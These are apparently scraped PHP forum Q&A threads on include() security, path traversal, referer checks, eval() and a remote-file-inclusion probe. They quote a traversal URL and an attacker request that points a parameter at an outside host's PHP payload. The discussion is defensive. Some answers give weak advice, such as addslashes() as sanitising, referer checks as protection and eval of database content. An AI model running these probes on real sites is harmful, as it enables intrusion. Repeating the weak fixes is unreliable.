/* define page path */
define("PAGE_DIR", "pages/");
if (file_exists(PAGE_DIR."$_GET[page].php")) include(PAGE_DIR."$_GET[page].php");
How safe is this? Could you for example include a page on another webserver if the page is in a folder called pages?
Thanks
This isn't safe at all - Think about what happens if $_GET[page] contains ../../../somewhere/else/
You should explicitly have a list of allowed pages.
Edit: I don't think it could include a file from a different server, but it's still not a good thing to be doing.
It's never good practice to pass unsanitized user input directly to a command, especially something like include(). You don't necessarily know how the underlying webserver/OS is going to handle, for example, relative paths, extended characters, etc. Any of these, used maliciously or otherwise, could result in the user seeing something they're not supposed to see.
One possible exploit: user passes in the relative path to a malicious script in a known location on the server. http://webserver/yourscript.php?page=%2e%2e%2f%2e%2e%2f%2e%2e%2fhome/bad_user/evil_script
which your function could translate to pages/../../../home/bad_user/evil_script.php, which include will happily include, sometimes. So your web page when served could very well execute bad_user's php script, which he could use to do all kinds of nasty stuff.
At the very least you should assign $_GET['path'] to a new variable and addslashes().
Doing anything with $_GET or $_POST prior to validating/sanitizing the data is dangerous. Assume that all users are out to get you, and sanitize the data prior to using it.
Related
I have an ajax.php file to which all of my ajax calls point with an extra parameter of the script the current call demands to execute. My problem is that I want to limit some scripts to being executed by specific pages only, say for example sendComment.php should only be called from www.mysite.com/user/{any user}.
What I have done is put this code on top of every script that I want to limit:
if(strstr($_SERVER['HTTP_REFERRER'],'mysite.com/{page_allowed_to_exec_script}'){
Then do stuff here
}
But what I've come to notice is that not all browsers support the HTTP_REFERRER ( I might have spelled that incorrectly, I'm writing this by memory ), and as well as not being cross-browser it's also a pain in the butt having to hardcode this stuff in all of the files and is going to be an even bigger pain when it comes to changing stuff.. I'm looking for a way I can possibly have all the scripts in an array with all the pages that are able to execute them, and perform a check in the ajax.php file at start.
Does anyone have any idea how this can be achieved?
Even all browsers may not send "referer" because of some kind of "proxy","firewall" or "security" suite strips it out or even changes it.So you can trust on it.
If you control the referring page you can use sessions, cookies or the URL to pass the information if you feel it's that vital. If it's absolutely vital, your only option is sessions. The other two can easily be removed.
I want to require/include a content from database record, but require/include only accepts files. This thing is related to caching, so I dont want to write anything to file (collisions etc). How to dodge it?
Are you fetching PHP code from a database? If so, you're probably doing it wrong. Ideally you should only store data inside a database, not code.
If you're fetching a PHP structure from the database, consider using a serialize()'d version of it (or json_encode()'d).
Maybe I have missed the exact purpose of what you're trying to accomplish, do let me know if I'm on the wrong path with my answer.
Whatever you do, don't rely on eval unless you really really have to; and even then, don't :)
Since others have covered eval() and the fact that this is a bad idea, I will touch on the topic of writing this "content" to a file. Use tempnam. This will give you the name of a just-created unique filename with 0600 permissions. You can then open it, write your content, close, then require/include. See Example #1 on the tempnam man page.
Make sure to check that the return value of tempnam is not false; make sure to unlink the file after you are done.
If it is code, you need to use eval(), though there are many anti-patterns that involve eval()
The manual says:
Caution The eval() language construct is very dangerous because it
allows execution of arbitrary PHP code. Its use thus is discouraged.
If you have carefully verified that there is no other option than to
use this construct, pay special attention not to pass any user
provided data into it without properly validating it beforehand.
This is very dangerous, especially if the database content was contributed from a user, but anyway you could use this :
eval($your_database_content);
Manual
On my website, I have a search.php page that makes $.get requests to pages like search_data.php and search_user_data.php etc.
The problem is all of these files are located within my public html folder.
Even though someone could browse to www.mysite.com/search_user_data.php, all of the data processed is properly escaped and handled, but on a professional level this is inadequate to even have this file within public reach.
I have tried moving the sensitive files to my web root, however since Jquery is making $.get requests and passing variables in the URL, this doesn't work.
Does anyone know any methods to firmly secure these vulnerable pages?
What you describe is normal.
You have PHP files that are reachable in your www directory so apache (or your favored webserver) can read and process them.
If you move them out you can't reach them anymore so there is no real option of that sort.
After all your PHP files for AJAX are just regular php files, likely your other project also contains php files. Right ? They are not more or less at risk than any script on your server.
Make sure you program "clean". Think about evil requests when writing your php functions, not after writing them.
As you already did: correctly quote all incoming input that might hit a database or sensitive function.
You can add security checks on your incoming values and create an automated email if you detect someone trying evil stuff. So you'll likely receive a warning in such cases.
But on the downside: You'll regularly receive warnings because some companies automatically scan websites for possible bugs. So you will receive a warning on such scans as well.
On top of writing your code as "secure" as you can, you may want to add a referer check in your code. That means your PHP file will only react if your website was given as referer when accessing it. That's enough to block 80% of the kids out there.
But on the downside: a few internet users do not send a referer at all, some proxies filter that. (I personally would ignore them, half the (www) internet breaks on them anyway)
One more layer of protection can be added by htaccess, you can do most within PHP but it might still be of interest for you: http://httpd.apache.org/docs/2.0/howto/htaccess.html
You can store a uid each time your page is loaded and store it in $_SESSION['uid']. You give this uid to javascript by doing :
var uid = <?php print $_SESSION['uid']; ?>;
Then you pass it with your get request, compare it to your $_SESSION :
if($_GET['uid'] != $_SESSION['uid']) // Stop with an error message or send a forbidden header.
If it's ok, do what you need.
It's not perfect since someone can request search.php and get the current uid, and then request the other pages, but it may be the best possible solution.
I've been told that it is unsecure to make database connections inside a PHP includes. For example If I have a login page and add an "include('process.php')" at the top of the page that has a database connection, is that unsecure?
For example If I have a login page and add an "include('process.php')" at the top of the page that has a database connection, is that unsecure?
No.
Maybe the person who told you this was talking about something else - like including a file using a dynamic value coming from a GET parameter, or using remote http:// includes, or as #AlienWebguy mentions, having the password include inside the web root. But using includes in itself is not insecure.
It's only insecure if you are storing your passwords literally in your PHP files. They should be declared outside of the web root. That being said, the lack of security is not due to the use of the include() function.
In and of itself, no, it is not insecure. How it's implemented inside the include is of course a different story.
That's the way I've always done it. I make sure that the include is in a different directory that has open permisions and that the directory your writing in has locked permisions. Hopefully that makes sense.
This question is way too broad to get a good answer from anyone. Short answer is no, there's nothing inherently insecure about including a file that connects to a database. However, if you write code that isn't written properly, then yes it may be insecure to do this.
Since using "include('process.php')" is exactly the same as pasting 'process.php' into the code of the other file, that should not be, per se, a security issue. The insecurity could be in your code, not in the fact the you use the "include". In fact, it could maybe improve the safety of your code, due the reuse.
A guy called ShiroHige is trying to hacking my website.
He tries to open a page with this parameter:
mysite/dir/nalog.php?path=http://smash2.fileave.com/zfxid1.txt???
If you look at that text file it is just a die(),
<?php /* ZFxID */ echo("Shiro"."Hige"); die("Shiro"."Hige"); /* ZFxID */ ?>
So what exploit is he trying to use (WordPress?)?
Edit 1:
I know he is trying use RFI.
Is there some popular script that are exploitable with that (Drupal, phpBB, etc.)?
An obvious one, just unsanitized include.
He is checking if the code gets executed.
If he finds his signature in a response, he will know that your site is ready to run whatever code he sends.
To prevent such attacks one have to strictly sanitize filenames, if they happen to be sent via HTTP requests.
A quick and cheap validation can be done using basename() function:
if (empty($_GET['page']))
$_GET['page']="index.php";
$page = $modules_dir.basename($_GET['page']).".php";
if (!is_readable($page)) {
header("HTTP/1.0 404 Not Found");
$page="404.html";
}
include $page;
or using some regular expression.
There is also an extremely useful PHP configuration directive called
allow_url_include
which is set to off by default in modern PHP versions. So it protects you from such attacks automatically.
The vulnerability the attacker is aiming for is probably some kind of remote file inclusion exploiting PHP’s include and similar functions/construct that allow to load a (remote) file and execute its contents:
Security warning
Remote file may be processed at the remote server (depending on the file extension and the fact if the remote server runs PHP or not) but it still has to produce a valid PHP script because it will be processed at the local server. If the file from the remote server should be processed there and outputted only, readfile() is much better function to use. Otherwise, special care should be taken to secure the remote script to produce a valid and desired code.
Note that using readfile does only avoids that the loaded file is executed. But it is still possible to exploit it to load other contents that are then printed directly to the user. This can be used to print the plain contents of files of any type in the local file system (i.e. Path Traversal) or to inject code into the page (i.e. Code Injection). So the only protection is to validate the parameter value before using it.
See also OWASP’s Development Guide on “File System – Includes and Remote files” for further information.
It looks like the attack is designed to print out "ShiroHige" on vulnerable sites.
The idea being, that is you use include, but do not sanitize your input, then the php in this text file is executed. If this works, then he can send any php code to your site and execute it.
A list of similar files can be found here. http://tools.sucuri.net/?page=tools&title=blacklist&detail=072904895d17e2c6c55c4783df7cb4db
He's trying to get your site to run his file. This would probably be an XSS attack? Not quite familiar with the terms (Edit: RFI - Remote file inclusion).
Odds are he doesn't know what he's doing. If there’s a way to get into WordPress, it would be very public by now.
I think its only a first test if your site is vulnerable to external includes. If the echo is printed, he knows its possible to inject code.
You're not giving much detail on the situation and leaving a lot to the imagination.
My guess is that he's trying to exploit allow_url_fopen. And right now he's just testing code to see what he can do. This is the first wave!
I think it is just a malicious URL. As soon as i entered it into my browser, Avast antivirus claimed it to be a malicious url. So that php code may be deceiving or he may just be testing. Other possibility is that the hacker has no bad intentions and just want to show that he could get over your security.